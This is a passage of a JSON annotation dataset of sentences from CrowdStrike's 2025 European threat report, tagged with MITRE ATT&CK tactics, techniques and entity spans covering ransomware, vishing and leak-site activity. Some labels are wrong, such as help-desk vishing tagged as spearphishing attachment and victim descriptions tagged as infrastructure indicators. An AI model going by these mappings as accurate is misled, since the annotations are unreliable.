"sentence_text": "Visit CrowdStrike’s Adversary Universe for the internet’s definitive source on adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s13-68a919", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 13, "context_before": "Visit CrowdStrike’s Adversary Universe for the internet’s definitive source on adversaries.", "sentence_text": "Listen to the Adversary Universe podcast to glean insights into threat actors and recommendations to amplify security practices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p2-s14-41e423", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 2, "sentence_id": 14, "context_before": "Listen to the Adversary Universe podcast to glean insights into threat actors and recommendations to amplify security practices.", "sentence_text": "and performance, reduced complexity and immediate time-to-value.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p2-s15-cf774f", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 2, "sentence_id": 15, "context_before": "and performance, reduced complexity and immediate time-to-value.", "sentence_text": "Learn more: https://www.crowdstrike.com/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p2-s17-4000f6", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 2, "sentence_id": 17, "context_before": "Follow us:", "sentence_text": "| Facebook | Instagram Start a free trial today: https://www.crowdstrike.com/free-trial-guide/ United States and other countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p2-s18-9ae509", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 2, "sentence_id": 18, "context_before": "| Facebook | Instagram Start a free trial today: https://www.crowdstrike.com/free-trial-guide/ United States and other countries.", "sentence_text": "View source version on businesswire.com: https://www.businesswire.com/news/home/20250803570128/en/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p2-s19-5af64c", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 2, "sentence_id": 19, "context_before": "View source version on businesswire.com: https://www.businesswire.com/news/home/20250803570128/en/", "sentence_text": "Media Contact Jake Schuster press@crowdstrike.com Source: CrowdStrike, Inc.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p1-s1-cb83ee", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "EUROPEAN\nTHREAT2025 LANDSCAPE\nREPORT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p2-s2-328aef", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 2, "sentence_id": 2, "context_before": "EUROPEAN\nTHREAT2025 LANDSCAPE\nREPORT", "sentence_text": "Table of Contents Executive Overview 3 Naming Conventions 4 eCrime Overview 5 Big Game Hunting 5 Dominant eCrime Techniques 9 Vishing Likely to Become a Significant Threat 9 Fake CAPTCHAs Remain a Common Delivery Method 10 Underground Ecosystem 11 Russian-Language eCrime Forums 11 English-Language eCrime Forums 12 Initial Access Brokers 14 Malware as a Service 15 Violence as a Service and Physical Cryptocurrency Theft 16 Nation-State Overview 17 Conflict-Driven Cyber Activity 18 Russia-Aligned Conflicts 18 Spillover from Middle Eastern Conflicts 23 Conflict-Driven Hacktivist Activity 24 Non-Conflict-Driven Nation-State Cyber Activity 26 Russia-Aligned Activity 26 Iran-Nexus Activity 30 China-Nexus Activity 33 DPRK-Nexus Activity 37 Rest-of-World Activity 40 Hacktivism and Non-State Overview 41 Industrial Control System Targeting 42 Hacktivist Response to European Law Enforcement Actions 42 Conclusion 43 Recommendations 44 About CrowdStrike 46", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p3-s3-5674ef", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 3, "sentence_id": 3, "context_before": "Table of Contents Executive Overview 3 Naming Conventions 4 eCrime Overview 5 Big Game Hunting 5 Dominant eCrime Techniques 9 Vishing Likely to Become a Significant Threat 9 Fake CAPTCHAs Remain a Common Delivery Method 10 Underground Ecosystem 11 Russian-Language eCrime Forums 11 English-Language eCrime Forums 12 Initial Access Brokers 14 Malware as a Service 15 Violence as a Service and Physical Cryptocurrency Theft 16 Nation-State Overview 17 Conflict-Driven Cyber Activity 18 Russia-Aligned Conflicts 18 Spillover from Middle Eastern Conflicts 23 Conflict-Driven Hacktivist Activity 24 Non-Conflict-Driven Nation-State Cyber Activity 26 Russia-Aligned Activity 26 Iran-Nexus Activity 30 China-Nexus Activity 33 DPRK-Nexus Activity 37 Rest-of-World Activity 40 Hacktivism and Non-State Overview 41 Industrial Control System Targeting 42 Hacktivist Response to European Law Enforcement Actions 42 Conclusion 43 Recommendations 44 About CrowdStrike 46", "sentence_text": "Executive Overview\nThe CrowdStrike 2025 European Threat Landscape Report provides key insights into observed cyber activity and related geopolitical developments across the region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p3-s4-c2a87a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 3, "sentence_id": 4, "context_before": "Executive Overview\nThe CrowdStrike 2025 European Threat Landscape Report provides key insights into observed cyber activity and related geopolitical developments across the region.", "sentence_text": "It summarizes the nation-state, eCrime, and hacktivism threats impacting Europe to inform public and private sector stakeholders.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p3-s5-689853", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 3, "sentence_id": 5, "context_before": "It summarizes the nation-state, eCrime, and hacktivism threats impacting Europe to inform public and private sector stakeholders.", "sentence_text": "While big game hunting (BGH) poses a persistent threat, Europe-based entities are also contending with evolving eCrime techniques, including campaigns leveraging voice phishing (vishing) and CAPTCHA lures.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "campaigns leveraging vishing and CAPTCHA lures", "entities": [ { "text": " leveraging", "start": 150, "end": 161, "label": "Action" }, { "text": " CAPTCHA lures", "start": 190, "end": 204, "label": "MalwareTool" }, { "text": "big game hunting (BGH) ", "start": 6, "end": 29, "label": "Action" }, { "text": ", Europe-based entities", "start": 54, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "voice phishing (vishing) ", "start": 162, "end": 187, "label": "Action" }, { "text": " eCrime techniques", "start": 111, "end": 129, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p3-s6-133725", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 3, "sentence_id": 6, "context_before": "While big game hunting (BGH) poses a persistent threat, Europe-based entities are also contending with evolving eCrime techniques, including campaigns leveraging voice phishing (vishing) and CAPTCHA lures.", "sentence_text": "Adversaries both originating from and targeting Europe benefit from a highly organized and resilient underground ecosystem, accessible via English- and Russian-language clearnet and darknet forums.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p3-s7-acf1da", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 3, "sentence_id": 7, "context_before": "Adversaries both originating from and targeting Europe benefit from a highly organized and resilient underground ecosystem, accessible via English- and Russian-language clearnet and darknet forums.", "sentence_text": "Russia’s full-scale invasion of Ukraine in February 2022 triggered a surge of targeted cyber intrusions focused on Ukrainian entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p3-s8-f62559", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 3, "sentence_id": 8, "context_before": "Russia’s full-scale invasion of Ukraine in February 2022 triggered a surge of targeted cyber intrusions focused on Ukrainian entities.", "sentence_text": "Though Russia-nexus and Russia-aligned threat actors conducted most of these, DPRK-nexus adversaries have also conducted operations targeting Ukrainian entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p3-s9-5972e4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 3, "sentence_id": 9, "context_before": "Though Russia-nexus and Russia-aligned threat actors conducted most of these, DPRK-nexus adversaries have also conducted operations targeting Ukrainian entities.", "sentence_text": "Beyond conflict-specific operations, Russia, Iran, the Democratic People’s Republic of Korea (DPRK), China, Türkiye, Kazakhstan, and India persistently target European entities through cyber operations driven by motives including strategic intelligence collection, information operations (IO), intellectual property theft, and opportunistic financial gain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p3-s10-a7482d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 3, "sentence_id": 10, "context_before": "Beyond conflict-specific operations, Russia, Iran, the Democratic People’s Republic of Korea (DPRK), China, Türkiye, Kazakhstan, and India persistently target European entities through cyber operations driven by motives including strategic intelligence collection, information operations (IO), intellectual property theft, and opportunistic financial gain.", "sentence_text": "This report offers an in-depth view of the European threat landscape based on produced by the CrowdStrike Counter Adversary Operations team, which integrates two closely aligned groups: CrowdStrike Intelligence and CrowdStrike OverWatch.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p3-s11-6adeeb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 3, "sentence_id": 11, "context_before": "This report offers an in-depth view of the European threat landscape based on produced by the CrowdStrike Counter Adversary Operations team, which integrates two closely aligned groups: CrowdStrike Intelligence and CrowdStrike OverWatch.", "sentence_text": "Leveraging this intelligence, the CrowdStrike OverWatch team conducts proactive threat hunting across customer telemetry to detect and address malicious activity before it escalates.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p4-s12-d3f7b1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 4, "sentence_id": 12, "context_before": "Leveraging this intelligence, the CrowdStrike OverWatch team conducts proactive threat hunting across customer telemetry to detect and address malicious activity before it escalates.", "sentence_text": "ADVERSARY NATION-STATE OR CATEGORY BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA)CONVENTIONS CRANE ROK (REPUBLIC OF KOREA)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p4-s13-767cc9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 4, "sentence_id": 13, "context_before": "ADVERSARY NATION-STATE OR CATEGORY BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA)CONVENTIONS CRANE ROK (REPUBLIC OF KOREA)", "sentence_text": "HAWK SYRIA\nJACKAL HACKTIVISTNAMING\nKITTEN IRAN\nLEOPARD PAKISTAN\nLYNX GEORGIA\nOCELOT COLOMBIA\nPANDA PEOPLE’S REPUBLIC OF CHINA SAIGA KAZAKHSTAN SPHINX EGYPT SPIDER eCRIME TIGER INDIA WOLF TÜRKIYE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p5-s14-9606e8", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 5, "sentence_id": 14, "context_before": "HAWK SYRIA\nJACKAL HACKTIVISTNAMING\nKITTEN IRAN\nLEOPARD PAKISTAN\nLYNX GEORGIA\nOCELOT COLOMBIA\nPANDA PEOPLE’S REPUBLIC OF CHINA SAIGA KAZAKHSTAN SPHINX EGYPT SPIDER eCRIME TIGER INDIA WOLF TÜRKIYE", "sentence_text": "As BGH adversaries typically base their ransom demands on a victim organization’s revenue, they likely perceive that European organizations can pay sizable ransoms.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "base ransom demands on victim's revenue", "entities": [ { "text": "BGH adversaries", "start": 3, "end": 18, "label": "ThreatActor" }, { "text": "ransom demand", "start": 40, "end": 53, "label": "Action" }, { "text": "victim organization’s revenue", "start": 60, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "European organizations ", "start": 117, "end": 140, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p5-s15-f111c7", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 5, "sentence_id": 15, "context_before": "As BGH adversaries typically base their ransom demands on a victim organization’s revenue, they likely perceive that European organizations can pay sizable ransoms.", "sentence_text": "• Political motives: Though BGH adversaries are predominantly financially motivated, some have expressed political stances and threatened politically motivated activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p5-s16-3e51e1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 5, "sentence_id": 16, "context_before": "• Political motives: Though BGH adversaries are predominantly financially motivated, some have expressed political stances and threatened politically motivated activity.", "sentence_text": "WIZARD SPIDER, for example, supported the 2022 Russian invasion of Ukraine, and EU organizations such as Europol have also warned that eCrime threat actors and hybrid threat actors1 are cooperating for mutual benefit.2 1 Hybrid threat actors conduct activity supporting a combination of motivations, including eCrime, nation-state, hacktivist, and information operations.\n2 https://www.europol.europa.eu/cms/sites/default/files/documents/EU-SOCTA-2025.pdf", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p6-s17-885a30", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 6, "sentence_id": 17, "context_before": "WIZARD SPIDER, for example, supported the 2022 Russian invasion of Ukraine, and EU organizations such as Europol have also warned that eCrime threat actors and hybrid threat actors1 are cooperating for mutual benefit.2 1 Hybrid threat actors conduct activity supporting a combination of motivations, including eCrime, nation-state, hacktivist, and information operations.\n2 https://www.europol.europa.eu/cms/sites/default/files/documents/EU-SOCTA-2025.pdf", "sentence_text": "These countries represent Europe’s largest economies — excluding Russia, which is absent from the dataset (see the ProhibitionsonTargetingEntitiesinRussiaandtheCISRegion section on page 12).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p6-s18-d1f70f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 6, "sentence_id": 18, "context_before": "These countries represent Europe’s largest economies — excluding Russia, which is absent from the dataset (see the ProhibitionsonTargetingEntitiesinRussiaandtheCISRegion section on page 12).", "sentence_text": "GRACEFUL SPIDER used Clop DLSs to publish data stolen from victims.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Use Clop data leak sites to publish data stolen from victims.", "entities": [ { "text": "GRACEFUL SPIDER", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "Clop DLSs", "start": 21, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "publish data stolen from victims", "start": 34, "end": 66, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p7-s19-62d4e2", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 7, "sentence_id": 19, "context_before": "GRACEFUL SPIDER used Clop DLSs to publish data stolen from victims.", "sentence_text": "During the reporting period, BITWISE SPIDER, PUNK SPIDER, OCULAR SPIDER, TRAVELING SPIDER, and BRAIN SPIDER impacted the highest number of European victims (Figure 2).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p7-s20-d018c9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 7, "sentence_id": 20, "context_before": "During the reporting period, BITWISE SPIDER, PUNK SPIDER, OCULAR SPIDER, TRAVELING SPIDER, and BRAIN SPIDER impacted the highest number of European victims (Figure 2).", "sentence_text": "Also during this time frame, law enforcement operations severely impacted some of these adversaries’ operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p7-s21-2eaaff", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 7, "sentence_id": 21, "context_before": "Also during this time frame, law enforcement operations severely impacted some of these adversaries’ operations.", "sentence_text": "For example, BITWISE SPIDER affiliates’ activity levels have significantly decreased following the multinational law enforcement effort Operation Cronos.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p7-s22-9164db", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 7, "sentence_id": 22, "context_before": "For example, BITWISE SPIDER affiliates’ activity levels have significantly decreased following the multinational law enforcement effort Operation Cronos.", "sentence_text": "8BASE DLS and arrested four alleged 8BASE ransomware operators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p7-s23-f80100", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 7, "sentence_id": 23, "context_before": "8BASE DLS and arrested four alleged 8BASE ransomware operators.", "sentence_text": "Additionally, OCULAR SPIDER closed their RansomHub ransomware as a service (RaaS) following conflicts between RansomHub affiliates and the DragonForce RaaS administrator.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p7-s24-32ed5d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 7, "sentence_id": 24, "context_before": "Additionally, OCULAR SPIDER closed their RansomHub ransomware as a service (RaaS) following conflicts between RansomHub affiliates and the DragonForce RaaS administrator.", "sentence_text": "Remotely encrypting files, executing ransomware — often from an unmanaged system3 — and running the file encryption process outside of the targeted system • Leveraging access to unmanaged systems to steal data and deploy ransomware •", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "remotely encrypt files, execute ransomware from unmanaged systems, steal data, deploy ransomware", "entities": [ { "text": "encrypting files", "start": 9, "end": 25, "label": "Action" }, { "text": "executing ", "start": 27, "end": 37, "label": "Action" }, { "text": " ransomware", "start": 36, "end": 47, "label": "MalwareTool" }, { "text": "unmanaged system", "start": 64, "end": 80, "label": "Infrastructure_Indicator" }, { "text": " targeted system", "start": 138, "end": 154, "label": "Infrastructure_Indicator" }, { "text": "file encryption", "start": 100, "end": 115, "label": "Action" }, { "text": "Leveraging access", "start": 157, "end": 174, "label": "Action" }, { "text": "unmanaged systems ", "start": 178, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "steal data", "start": 199, "end": 209, "label": "Action" }, { "text": "deploy ", "start": 214, "end": 221, "label": "Action" }, { "text": " ransomware", "start": 220, "end": 231, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p7-s25-980099", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 7, "sentence_id": 25, "context_before": "Remotely encrypting files, executing ransomware — often from an unmanaged system3 — and running the file encryption process outside of the targeted system • Leveraging access to unmanaged systems to steal data and deploy ransomware •", "sentence_text": "Deploying Linux ransomware on VMware ESXi infrastructure 3", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Deploying Linux ransomware on VMware ESXi infrastructure", "entities": [ { "text": "Deploying ", "start": 0, "end": 10, "label": "Action" }, { "text": "Linux ransomware ", "start": 10, "end": 27, "label": "MalwareTool" }, { "text": " VMware ESXi infrastructure", "start": 29, "end": 56, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p7-s26-dab3bf", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 7, "sentence_id": 26, "context_before": "Deploying Linux ransomware on VMware ESXi infrastructure 3", "sentence_text": "An unmanaged system is a system that does not feature any installed endpoint detection and response (EDR) software.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s27-959243", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 27, "context_before": "An unmanaged system is a system that does not feature any installed endpoint detection and response (EDR) software.", "sentence_text": "SCATTERED SPIDER Targets U.K. Retail Sector in 2025 IN 2024, THE ADVERSARY AVERAGED 35.5 HOURS BETWEEN INITIAL ACCESS AND RANSOMWARE DEPLOYMENT, AND IN A MID-2025 INCIDENT, THAT TIME WAS REDUCED TO APPROXIMATELY 24 HOURS.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "targets retail sector; reduced time from initial access to ransomware deployment from 35.5 to 24 hours", "entities": [ { "text": "SCATTERED SPIDER", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "Targets", "start": 17, "end": 24, "label": "Action" }, { "text": " U.K. Retail Sector", "start": 24, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "THE ADVERSARY", "start": 61, "end": 74, "label": "ThreatActor" }, { "text": "INITIAL ACCESS", "start": 103, "end": 117, "label": "Action" }, { "text": "DEPLOYMENT", "start": 133, "end": 143, "label": "Action" }, { "text": "RANSOMWARE", "start": 122, "end": 132, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s28-d1a19d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 28, "context_before": "SCATTERED SPIDER Targets U.K. Retail Sector in 2025 IN 2024, THE ADVERSARY AVERAGED 35.5 HOURS BETWEEN INITIAL ACCESS AND RANSOMWARE DEPLOYMENT, AND IN A MID-2025 INCIDENT, THAT TIME WAS REDUCED TO APPROXIMATELY 24 HOURS.", "sentence_text": "Active since 2022, SCATTERED SPIDER has become one of the most aggressive and disruptive eCrime adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s29-539a18", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 29, "context_before": "Active since 2022, SCATTERED SPIDER has become one of the most aggressive and disruptive eCrime adversaries.", "sentence_text": "Since 2023, the adversary has predominantly targeted high-value enterprise organizations in ransomware and data theft campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "target enterprise organizations in ransomware and data theft campaigns", "entities": [ { "text": "ransomware", "start": 92, "end": 102, "label": "MalwareTool" }, { "text": "data theft", "start": 107, "end": 117, "label": "Action" }, { "text": "high-value enterprise organizations", "start": 53, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "targeted ", "start": 44, "end": 53, "label": "Action" }, { "text": "the adversary", "start": 12, "end": 25, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s30-f6a79e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 30, "context_before": "Since 2023, the adversary has predominantly targeted high-value enterprise organizations in ransomware and data theft campaigns.", "sentence_text": "SCATTERED SPIDER’s intrusions are characterized by the sophisticated help desk vishing campaigns they use to gain initial access, their innovative cloud-conscious tradecraft, and — most especially — their speed.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "use help desk vishing campaigns to gain initial access", "entities": [ { "text": "SCATTERED SPIDER", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": " intrusions", "start": 18, "end": 29, "label": "Action" }, { "text": "gain initial access", "start": 109, "end": 128, "label": "Action" }, { "text": "help desk vishing campaigns", "start": 69, "end": 96, "label": "Action" }, { "text": "cloud-conscious tradecraft", "start": 147, "end": 173, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s31-b61fe1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 31, "context_before": "SCATTERED SPIDER’s intrusions are characterized by the sophisticated help desk vishing campaigns they use to gain initial access, their innovative cloud-conscious tradecraft, and — most especially — their speed.", "sentence_text": "The April 2025 activity included a possible attempted close-access operation in which a threat actor linked to the eCrime ecosystem often referred to as “The Com” — a primarily English-speaking online ecosystem comprising multiple interconnected subgroups — attempted to recruit individuals to visit the corporate headquarters of a U.K.-based retailer that reportedly sustained a SCATTERED SPIDER attack.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1591.002", "name": "Business Relationships" } ], "procedure": "recruit individuals for close-access operation against retailer", "entities": [ { "text": "threat actor ", "start": 88, "end": 101, "label": "ThreatActor" }, { "text": "The Com", "start": 154, "end": 161, "label": "ThreatActor" }, { "text": "U.K.-based retailer", "start": 332, "end": 351, "label": "Infrastructure_Indicator" }, { "text": " recruit", "start": 270, "end": 278, "label": "Action" }, { "text": " visit ", "start": 293, "end": 300, "label": "Action" }, { "text": "SPIDER ", "start": 390, "end": 397, "label": "ThreatActor" }, { "text": " attack", "start": 396, "end": 403, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s32-0c057c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 32, "context_before": "The April 2025 activity included a possible attempted close-access operation in which a threat actor linked to the eCrime ecosystem often referred to as “The Com” — a primarily English-speaking online ecosystem comprising multiple interconnected subgroups — attempted to recruit individuals to visit the corporate headquarters of a U.K.-based retailer that reportedly sustained a SCATTERED SPIDER attack.", "sentence_text": "Whether the close-access operation occurred remains unconfirmed; however, the discussion of such a technique distinguishes Western eCrime threat actors from their Russian counterparts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s33-000ecd", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 33, "context_before": "Whether the close-access operation occurred remains unconfirmed; however, the discussion of such a technique distinguishes Western eCrime threat actors from their Russian counterparts.", "sentence_text": "Unlike most prominent BGH adversaries, SCATTERED SPIDER operators are based in Western countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s34-6a71a2", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 34, "context_before": "Unlike most prominent BGH adversaries, SCATTERED SPIDER operators are based in Western countries.", "sentence_text": "In July 2025, the U.K. National Crime Agency announced the arrests of four individuals, aged between 17 and 20, in relation to recent incidents impacting U.K.-based retailers.4 In September 2025, two of those individuals were arrested again and charged for their role in a 2024 incident impacting Transport for London.5", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s35-f9cce3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 35, "context_before": "In July 2025, the U.K. National Crime Agency announced the arrests of four individuals, aged between 17 and 20, in relation to recent incidents impacting U.K.-based retailers.4 In September 2025, two of those individuals were arrested again and charged for their role in a 2024 incident impacting Transport for London.5", "sentence_text": "These individuals were active from at least 2022 despite previous arrests, demonstrating the challenges of disrupting eCrime activity even when an adversary’s personnel are within an authority’s jurisdiction.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p8-s36-cc2f8e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 8, "sentence_id": 36, "context_before": "These individuals were active from at least 2022 despite previous arrests, demonstrating the challenges of disrupting eCrime activity even when an adversary’s personnel are within an authority’s jurisdiction.", "sentence_text": "4 https://www.nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrods\n5 https://www.nationalcrimeagency.gov.uk/news/two-charged-for-tfl-cyber-attack", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p9-s37-fc23fb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 9, "sentence_id": 37, "context_before": "4 https://www.nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrods\n5 https://www.nationalcrimeagency.gov.uk/news/two-charged-for-tfl-cyber-attack", "sentence_text": "Dominant eCrime Techniques VISHING LIKELY TO BECOME A SIGNIFICANT THREAT Since 2024, eCrime adversaries have increasingly used vishing to gain initial DURING THE REPORTING access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "use vishing to gain initial access", "entities": [ { "text": "eCrime adversaries", "start": 85, "end": 103, "label": "ThreatActor" }, { "text": "vishing", "start": 127, "end": 134, "label": "Action" }, { "text": " gain initial", "start": 137, "end": 150, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p9-s38-ada61a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 9, "sentence_id": 38, "context_before": "Dominant eCrime Techniques VISHING LIKELY TO BECOME A SIGNIFICANT THREAT Since 2024, eCrime adversaries have increasingly used vishing to gain initial DURING THE 